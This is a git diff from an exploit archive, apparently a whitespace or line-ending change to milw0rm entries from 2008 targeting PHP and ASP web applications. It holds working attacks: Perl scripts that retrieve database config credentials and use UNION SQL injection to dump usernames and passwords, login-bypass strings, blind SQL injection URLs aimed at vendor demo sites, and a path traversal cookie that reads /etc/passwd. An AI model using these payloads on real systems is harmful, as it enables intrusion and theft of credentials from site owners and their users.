+   $data[6] =~ s/DB_HOST/\0/; # db name
+   $data[5] =~ s/DEF_DB/\0/;  # db type
+
+   @conf = (
+             'dbhost:'   => $data[7],
+             'dbname:'   => $data[6],
+             'dbtype:'   => $data[5],
+             'username:' => $data[8],
+             'password:' => $data[9],
+          );                
+
+   foreach(@conf)
+   {
+      $result .= $_;
+   }       
+
+   my $content = join '',split / /,$result;
+
+   if($content =~ /(dbhost|dbname|dbtype|username|password)/i)
+   {
+      print STDOUT "[-] Exploit Successfully!\n";
+      print STDOUT $content;
+      exit; 
+   }
+   else
+   {
+      print STDOUT "[-] Exploit Failed!\n";
+      print STDOUT "[-] by athos - staker[at]hotmail[dot]it\n";
+      exit;
+   }  
+}
+
+
+sub dbconfig
+{
+   my $html;
+   my $sock = new IO::Socket::INET(
+                                    PeerAddr => $host,
+                                    PeerPort => 80,
+                                    Proto    => 'tcp',
+                                  ) or die $!;
+                                  
+                                     
+   my $data = "GET /$path/accms.dat HTTP/1.1\r\n".
+              "Host: $host\r\n".
+              "User-Agent: Lynx (textmode)\r\n".
+              "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
+              "Accept-Language: en-us,en;q=0.5\r\n".
+              "Accept-Encoding: text/plain\r\n".
+              "Connection: close\r\n\r\n";
+              
+   $sock->send($data);
+  
+   while(<$sock>) 
+   { 
+      $html .= $_; 
+   }  return $html if $html =~ m{HTTP/1.1 200 OK};            
+}   
+   
+   
+   
+sub usage
+{
+   print STDOUT "[-] All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit\n";
+   print STDOUT "[-] Usage: perl $0 [host] [path] [mode]\n";
+   print STDOUT "           perl $0 localhost /cms all\n";
+   print STDOUT "           perl $0 localhost /cms default\n"; 
+   exit;
+}  
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7267.txt b/platforms/php/webapps/7267.txt
index ba04aa356..d7efe5186 100755
--- a/platforms/php/webapps/7267.txt
+++ b/platforms/php/webapps/7267.txt
@@ -1,34 +1,34 @@
--------------------------------------------------------------------------
-  --          JIKO FroM No-exploit.Com        ---
--------------------------------------------------------------------------
-# Author  : jiko
-# email  : jalikom@hotmail.com
-# Home   : www.no-exploit.Com
-# Script  : http://relative.nl/projects.php?subMnuItem=1
-
-=========================JIkI Team===================
-# Exploit  :
-               http://no-exploit.com
-                real name of admin or ember
- Username : demo1  ' or ' 1=1
- Password : demo1 ' or ' 1=1 or JIKO or  any thing
-ex:
- Username : demo1 ' or ' 1=1
- Password : demo1 ' or ' 1=1 or JIKO or  any thing
-
-=========================JIKI Team===================
- greetz : all my friend and all No-exploit members and
- $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR
- all muslims
- visit:  ==> www.no-exploit.Com
- Visit: My-montada.Co.cc For your free Forum
--------------------------------------------------------------------------
-  --            JIKI Team [ JIKO + KIl1er ]    --
--------------------------------------------------------------------------
-------==        troops of Mohamed comming inchalah     =-----------------
-Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]        ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-# milw0rm.com [2008-11-28]
+-------------------------------------------------------------------------
+  --          JIKO FroM No-exploit.Com        ---
+-------------------------------------------------------------------------
+# Author  : jiko
+# email  : jalikom@hotmail.com
+# Home   : www.no-exploit.Com
+# Script  : http://relative.nl/projects.php?subMnuItem=1
+
+=========================JIkI Team===================
+# Exploit  :
+               http://no-exploit.com
+                real name of admin or ember
+ Username : demo1  ' or ' 1=1
+ Password : demo1 ' or ' 1=1 or JIKO or  any thing
+ex:
+ Username : demo1 ' or ' 1=1
+ Password : demo1 ' or ' 1=1 or JIKO or  any thing
+
+=========================JIKI Team===================
+ greetz : all my friend and all No-exploit members and
+ $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR
+ all muslims
+ visit:  ==> www.no-exploit.Com
+ Visit: My-montada.Co.cc For your free Forum
+-------------------------------------------------------------------------
+  --            JIKI Team [ JIKO + KIl1er ]    --
+-------------------------------------------------------------------------
+------==        troops of Mohamed comming inchalah     =-----------------
+Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya cyber-zone , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]        ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7268.txt b/platforms/php/webapps/7268.txt
index 58e4c0f65..e2f845ded 100755
--- a/platforms/php/webapps/7268.txt
+++ b/platforms/php/webapps/7268.txt
@@ -1,43 +1,43 @@
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-                                                                     +
-        Bluo cms 1.2  blind sql injection Vulnerability              +
-                                                                     +
-Discovered by : The_5p3ctrum                                         +
-Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org           +                                                            +
-                                                                     +
-                      Mor0ccan Nightmares                            +
-                                                                     +
-                                                                     +
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-#####################################################
-
-APPLICATION    : bluocms
-DOWNLOAD(299 $): http://www.bluocms.com/shop.php
-VENDOR         : http://www.bluocms.com
-DEMO           : http://www.bluocms.com/demo
-
-#####################################################
-
-
-[+] vuln    : blind sql injection
-              
-
-[+] Exploit : 
-              true:
-               
-              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5
-              http://www.bluocms.com/demo/index.php?id=511 and 1=1
-              
-              false:
-              
-              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4
-              http://www.bluocms.com/demo/index.php?id=511 and 1=2
-
-##########################################################################################################
-                                                                                                         #
-# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends   #
-                                                                                                         #
-##########################################################################################################
-
-# milw0rm.com [2008-11-28]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                     +
+        Bluo cms 1.2  blind sql injection Vulnerability              +
+                                                                     +
+Discovered by : The_5p3ctrum                                         +
+Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org           +                                                            +
+                                                                     +
+                      Mor0ccan Nightmares                            +
+                                                                     +
+                                                                     +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+#####################################################
+
+APPLICATION    : bluocms
+DOWNLOAD(299 $): http://www.bluocms.com/shop.php
+VENDOR         : http://www.bluocms.com
+DEMO           : http://www.bluocms.com/demo
+
+#####################################################
+
+
+[+] vuln    : blind sql injection
+              
+
+[+] Exploit : 
+              true:
+               
+              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5
+              http://www.bluocms.com/demo/index.php?id=511 and 1=1
+              
+              false:
+              
+              http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4
+              http://www.bluocms.com/demo/index.php?id=511 and 1=2
+
+##########################################################################################################
+                                                                                                         #
+# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends   #
+                                                                                                         #
+##########################################################################################################
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7269.pl b/platforms/php/webapps/7269.pl
index 65fb6c84a..857c93ec8 100755
--- a/platforms/php/webapps/7269.pl
+++ b/platforms/php/webapps/7269.pl
@@ -1,92 +1,92 @@
-#!/usr/bin/perl -w
-#==========================================================
-# CMS little (index.php term) Remote SQL Injection Exploit
-#==========================================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 28 November 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : CMS little
-#VERSION     : 0.0.1
-#DOWNLOAD    : http://downloads.sourceforge.net/littlecms/CMSLite.zip
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#
-#######################################################################################
-#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-if ($#ARGV+1 != 2)
-{
-   print "\n==============================================\n";
-   print "    CMS little Remote SQL Injection Exploit   \n";
-   print "                                              \n";
-   print "        Discovered By CWH Underground         \n";
-   print "==============================================\n";
-   print "                                              \n";
-   print "  ,--^----------,--------,-----,-------^--,   \n";
-   print "  | |||||||||   `--------'     |          O	\n";
-   print "  `+---------------------------^----------|   \n";
-   print "    `\_,-------, _________________________|   \n";
-   print "      / XXXXXX /`|     /                      \n";
-   print "     / XXXXXX /  `\   /                       \n";
-   print "    / XXXXXX /\______(                        \n";
-   print "   / XXXXXX /                                 \n";
-   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
-   print " (________(                                   \n";
-   print "  `------'                                    \n";
-   print "                                              \n"; 
-   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
-   print "Example: ./xpl.pl http://www.target.com/cmslite 10\n";
-   exit();
-}
-
-$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
-$number = $ARGV[1];
-
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
-print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print "\n[+]Dump Username and Password\n";
-
-for ($start=0;$start<$number;$start++) {
-
-$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$req = HTTP::Request->new(GET => $target."/index.php?term=a%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,name,0x3a3a,password,0x3a3a3a),3,4,5,6,7,8,9,10,11,12%20from%20personal_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
-$res = $xpl->request($req);
-$info = $res->content;
-$count=$start+1;
-
-if ($info =~ /:::(.+):::/)
-{
-$dump=$1;
-($username,$password)= split('::',$dump);
-printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
-}
-else { 
-	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
-	exit;
-}
-
-# milw0rm.com [2008-11-28]
+#!/usr/bin/perl -w
+#==========================================================
+# CMS little (index.php term) Remote SQL Injection Exploit
+#==========================================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 28 November 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : CMS little
+#VERSION     : 0.0.1
+#DOWNLOAD    : http://downloads.sourceforge.net/littlecms/CMSLite.zip
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#
+#######################################################################################
+#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+if ($#ARGV+1 != 2)
+{
+   print "\n==============================================\n";
+   print "    CMS little Remote SQL Injection Exploit   \n";
+   print "                                              \n";
+   print "        Discovered By CWH Underground         \n";
+   print "==============================================\n";
+   print "                                              \n";
+   print "  ,--^----------,--------,-----,-------^--,   \n";
+   print "  | |||||||||   `--------'     |          O	\n";
+   print "  `+---------------------------^----------|   \n";
+   print "    `\_,-------, _________________________|   \n";
+   print "      / XXXXXX /`|     /                      \n";
+   print "     / XXXXXX /  `\   /                       \n";
+   print "    / XXXXXX /\______(                        \n";
+   print "   / XXXXXX /                                 \n";
+   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+   print " (________(                                   \n";
+   print "  `------'                                    \n";
+   print "                                              \n"; 
+   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
+   print "Example: ./xpl.pl http://www.target.com/cmslite 10\n";
+   exit();
+}
+
+$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
+$number = $ARGV[1];
+
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
+print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print "\n[+]Dump Username and Password\n";
+
+for ($start=0;$start<$number;$start++) {
+
+$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$req = HTTP::Request->new(GET => $target."/index.php?term=a%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,name,0x3a3a,password,0x3a3a3a),3,4,5,6,7,8,9,10,11,12%20from%20personal_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
+$res = $xpl->request($req);
+$info = $res->content;
+$count=$start+1;
+
+if ($info =~ /:::(.+):::/)
+{
+$dump=$1;
+($username,$password)= split('::',$dump);
+printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
+}
+else { 
+	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
+	exit;
+}
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7270.txt b/platforms/php/webapps/7270.txt
index ad7c9a76e..b3d75f06d 100755
--- a/platforms/php/webapps/7270.txt
+++ b/platforms/php/webapps/7270.txt
@@ -1,42 +1,42 @@
-[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
- [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
-    
- [~]Vendor:www.revou.com
-    
- [~]Software: ReVou Online
-    
- [~]author: ((я3d D3v!L))
-    
- [~] Date: 28.11.2008
-    
- [~] Home: www.ahacker.biz
-    
- [~] contact: N/A
-
-[~] -----------------------------{str0ke}------------------------------
-    
-    
- [~] Exploit:
-    
-     username: r0' or ' 1=1--
-     password: r0' or ' 1=1--
-    
-    
- [~]login 4 d3m0:
-    
-     http://www.revou.com/demo/
- 
- [~]-----------------------------{str0ke}---------------------------------------------------
- 
-     [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
-     [~]
-     [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
-     [~]
-     [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
-     [~]
-     [~] xp10.biz & ahacker.biz
-     [~]
- 
- [~]--------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-28]
+[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
+ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
+    
+ [~]Vendor:www.revou.com
+    
+ [~]Software: ReVou Online
+    
+ [~]author: ((я3d D3v!L))
+    
+ [~] Date: 28.11.2008
+    
+ [~] Home: www.ahacker.biz
+    
+ [~] contact: N/A
+
+[~] -----------------------------{str0ke}------------------------------
+    
+    
+ [~] Exploit:
+    
+     username: r0' or ' 1=1--
+     password: r0' or ' 1=1--
+    
+    
+ [~]login 4 d3m0:
+    
+     http://www.revou.com/demo/
+ 
+ [~]-----------------------------{str0ke}---------------------------------------------------
+ 
+     [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
+     [~]
+     [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
+     [~]
+     [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
+     [~]
+     [~] xp10.biz & ahacker.biz
+     [~]
+ 
+ [~]--------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7271.txt b/platforms/php/webapps/7271.txt
index 790fba1b1..3dde3ede6 100755
--- a/platforms/php/webapps/7271.txt
+++ b/platforms/php/webapps/7271.txt
@@ -1,18 +1,18 @@
-#########################################################
----------------------------------------------------------
-Portal Name: Ocean12 FAQ Manager Pro
-Author : Mountassif Moad
- Evil Finger / v4 Team
-Vulnerability : Blind Sql Injection
----------------------------------------------------------
-#########################################################
-Exploit :
-site.com/?Action=Cat&ID=40%20and%201=1 true
-site.com/?Action=Cat&ID=40%20and%201=0 false
-Demo :
-http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true
-http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false
-
-# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
-
-# milw0rm.com [2008-11-28]
+#########################################################
+---------------------------------------------------------
+Portal Name: Ocean12 FAQ Manager Pro
+Author : Mountassif Moad
+ Evil Finger / v4 Team
+Vulnerability : Blind Sql Injection
+---------------------------------------------------------
+#########################################################
+Exploit :
+site.com/?Action=Cat&ID=40%20and%201=1 true
+site.com/?Action=Cat&ID=40%20and%201=0 false
+Demo :
+http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true
+http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false
+
+# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
+
+# milw0rm.com [2008-11-28]
diff --git a/platforms/php/webapps/7284.txt b/platforms/php/webapps/7284.txt
index 3351a3179..596883fc8 100755
--- a/platforms/php/webapps/7284.txt
+++ b/platforms/php/webapps/7284.txt
@@ -1,64 +1,64 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO              WwW.Exploiter5.CoM , WwW.No-ExploiT.CoM , WwW.IQ-TY.CoM                                      [!]
-***********************************************************************************************************************************************************
-+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                                                [ PHP TV Portal<= 2.0 (mid) Remote SQL Injection ]                                                     ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   TeaM     : Mor0ccan Nightmares                                                                        ¦       ¦                                       ¦
-¦   Script   : http://www.businessvein.com/                                                               ¦       ¦                ![ 4 ]!                  ¦
-¦   Download : http://www.businessvein.com/php-tv-portal.html                                             ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz  [!]             ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-
-ExploiT :
-
-http://localhost/tv_portal/index.php?mid=[SQL]
-
-[SQL]=-11+union+select+1,version(),3,4--
-
-Live demo :
-
-http://www.businessvein.com/tv_portal/index.php?mid=-11+union+select+1,version(),3,4--
-
-Raha Nayda Nood
-Mgharba :)
-
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-29]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO              WwW.Exploiter5.CoM , WwW.No-ExploiT.CoM , WwW.IQ-TY.CoM                                      [!]
+***********************************************************************************************************************************************************
++----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                                                [ PHP TV Portal<= 2.0 (mid) Remote SQL Injection ]                                                     ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   TeaM     : Mor0ccan Nightmares                                                                        ¦       ¦                                       ¦
+¦   Script   : http://www.businessvein.com/                                                               ¦       ¦                ![ 4 ]!                  ¦
+¦   Download : http://www.businessvein.com/php-tv-portal.html                                             ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++          [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz  [!]             ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+
+ExploiT :
+
+http://localhost/tv_portal/index.php?mid=[SQL]
+
+[SQL]=-11+union+select+1,version(),3,4--
+
+Live demo :
+
+http://www.businessvein.com/tv_portal/index.php?mid=-11+union+select+1,version(),3,4--
+
+Raha Nayda Nood
+Mgharba :)
+
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-29]
diff --git a/platforms/php/webapps/7285.txt b/platforms/php/webapps/7285.txt
index b7667c7cc..1babe574f 100755
--- a/platforms/php/webapps/7285.txt
+++ b/platforms/php/webapps/7285.txt
@@ -1,24 +1,24 @@
-Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
-Vendor: CMS Made Simple
-Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
-Author: M4ck-h@cK
-Date 29.11.2008
-Home: sweet home
-contact: no, thx :)
-
-Exploit:
-
-
-Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]
-
-GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
-Accept: */*
-User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
-Host: demo.cmsmadesimple.fr
-Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
-Connection: Close
-Pragma: no-cache
-
-It's possible to set "cms_language" value in order to view /etc/passwd file.
-
-# milw0rm.com [2008-11-29]
+Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
+Vendor: CMS Made Simple
+Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
+Author: M4ck-h@cK
+Date 29.11.2008
+Home: sweet home
+contact: no, thx :)
+
+Exploit:
+
+
+Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]
+
+GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
+Accept: */*
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
+Host: demo.cmsmadesimple.fr
+Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
+Connection: Close
+Pragma: no-cache
+
+It's possible to set "cms_language" value in order to view /etc/passwd file.
+
+# milw0rm.com [2008-11-29]
diff --git a/platforms/php/webapps/7286.txt b/platforms/php/webapps/7286.txt
index 5ba0a8c08..6841a4672 100755
--- a/platforms/php/webapps/7286.txt
+++ b/platforms/php/webapps/7286.txt
@@ -1,29 +1,29 @@
-........................
-
-..............................................
-+++++Bypass Config Download Vulnerability+++++
-...............................................
-
-script:Oramon = Oracle Database Monitoring
-
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-download:http://www.oramon.org/downloads/oramon.tar.gz
-
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-expl:
-
-$USERID=
-$PASSWORD=
-$DATABASE=
-
-www.site.com/path/config/oramon.ini
-
-   
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-  | | | | | |
-Author: ahmadbady  
-  | | | | | |
-my mail: kivi_hacker666@yahoo.com | | | | | |
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2008-11-29]
+........................
+
+..............................................
++++++Bypass Config Download Vulnerability+++++
+...............................................
+
+script:Oramon = Oracle Database Monitoring
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+download:http://www.oramon.org/downloads/oramon.tar.gz
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+expl:
+
+$USERID=
+$PASSWORD=
+$DATABASE=
+
+www.site.com/path/config/oramon.ini
+
+   
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+  | | | | | |
+Author: ahmadbady  
+  | | | | | |
+my mail: kivi_hacker666@yahoo.com | | | | | |
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2008-11-29]
diff --git a/platforms/php/webapps/7290.txt b/platforms/php/webapps/7290.txt
index 4ec54ab9d..91afc467c 100755
--- a/platforms/php/webapps/7290.txt
+++ b/platforms/php/webapps/7290.txt
@@ -1,24 +1,24 @@
- [~]Tybe     : Remote Blind SQL Injection Vulnerability
-   
- [~]Vendor   : www.activewebsoftwares.com
-   
- [~]Software : Active Bids
-   
- [~]author   : Mountassif Moad
-
-
-
-http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1
-
-http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0
-
-Demo :
-
-http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1
-
-http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0
-
-
-# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
-
-# milw0rm.com [2008-11-29]
